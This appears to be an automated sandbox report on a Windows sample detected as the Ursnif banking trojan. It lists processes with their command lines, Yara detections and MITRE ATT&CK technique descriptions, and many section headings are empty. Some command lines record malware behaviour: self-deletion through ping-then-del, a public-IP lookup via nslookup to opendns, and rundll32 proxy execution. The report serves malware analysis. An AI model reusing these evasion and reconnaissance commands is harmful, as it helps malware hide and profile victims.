Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: conhost.exe PID: 4488 Parent PID: 4856

General

Start time:	20:59:29
Start date:	23/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: csc.exe PID: 6736 Parent PID: 4856

General

Start time:	20:59:46
Start date:	23/11/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline
Imagebase:	0x7ff76af80000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Analysis Process: control.exe PID: 2904 Parent PID: 5556

General

Start time:	20:59:48
Start date:	23/11/2021
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff68e550000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Analysis Process: cvtres.exe PID: 6272 Parent PID: 6736

General

Start time:	20:59:50
Start date:	23/11/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB8.tmp" "c:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP"
Imagebase:	0x7ff7bcf00000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: csc.exe PID: 5464 Parent PID: 4856

General

Start time:	20:59:55
Start date:	23/11/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline
Imagebase:	0x7ff76af80000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Analysis Process: cvtres.exe PID: 6088 Parent PID: 5464

General

Start time:	20:59:57
Start date:	23/11/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A77.tmp" "c:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP"
Imagebase:	0x7ff7bcf00000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: explorer.exe PID: 3352 Parent PID: 2904

General

Start time:	20:59:58
Start date:	23/11/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff720ea0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 7028 Parent PID: 3352

General

Start time:	21:00:14
Start date:	23/11/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe
Imagebase:	0x7ff688850000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 5016 Parent PID: 7028

General

Start time:	21:00:15
Start date:	23/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: PING.EXE PID: 4712 Parent PID: 7028

General

Start time:	21:00:15
Start date:	23/11/2021
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping localhost -n 5
Imagebase:	0x7ff611020000
File size:	21504 bytes
MD5 hash:	6A7389ECE70FB97BFE9A570DB4ACCC3B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: RuntimeBroker.exe PID: 4084 Parent PID: 3352

General

Start time:	21:00:24
Start date:	23/11/2021
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6225d0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, Author: Joe Security

Analysis Process: rundll32.exe PID: 6080 Parent PID: 2904

General

Start time:	21:00:25
Start date:	23/11/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Imagebase:	0x7ff7d6010000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, Author: Joe Security

Analysis Process: RuntimeBroker.exe PID: 4176 Parent PID: 3352

General

Start time:	21:00:45
Start date:	23/11/2021
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6225d0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, Author: Joe Security

Analysis Process: RuntimeBroker.exe PID: 4440 Parent PID: 3352

General

Start time:	21:01:06
Start date:	23/11/2021
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6225d0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, Author: Joe Security

Analysis Process: RuntimeBroker.exe PID: 4544 Parent PID: 3352

General

Start time:	21:01:20
Start date:	23/11/2021
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6225d0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, Author: Joe Security

Analysis Process: cmd.exe PID: 6536 Parent PID: 3352

General

Start time:	21:01:26
Start date:	23/11/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\2227.bi1"
Imagebase:	0x7ff688850000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: RuntimeBroker.exe PID: 1504 Parent PID: 3352

General

Start time:	21:01:26
Start date:	23/11/2021
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6225d0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6736 Parent PID: 6536

General

Start time:	21:01:32
Start date:	23/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: nslookup.exe PID: 5192 Parent PID: 6536

General

Start time:	21:01:32
Start date:	23/11/2021
Path:	C:\Windows\System32\nslookup.exe
Wow64 process (32bit):	false
Commandline:	nslookup myip.opendns.com resolver1.opendns.com
Imagebase:	0x7ff779890000
File size:	86528 bytes
MD5 hash:	AF1787F1DBE0053D74FC687E7233F8CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 3424 Parent PID: 3352

General

Start time:	21:01:34
Start date:	23/11/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\2227.bi1"
Imagebase:	0x7ff688850000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 5208 Parent PID: 3424

General

Start time:	21:01:35
Start date:	23/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 6088 Parent PID: 3352

General

Start time:	21:01:36
Start date:	23/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, Author: Joe Security

Analysis Process: conhost.exe PID: 5660 Parent PID: 6088

General

Start time:	21:01:38
Start date:	23/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report FpYf5EGDO9.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Data Obfuscation:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

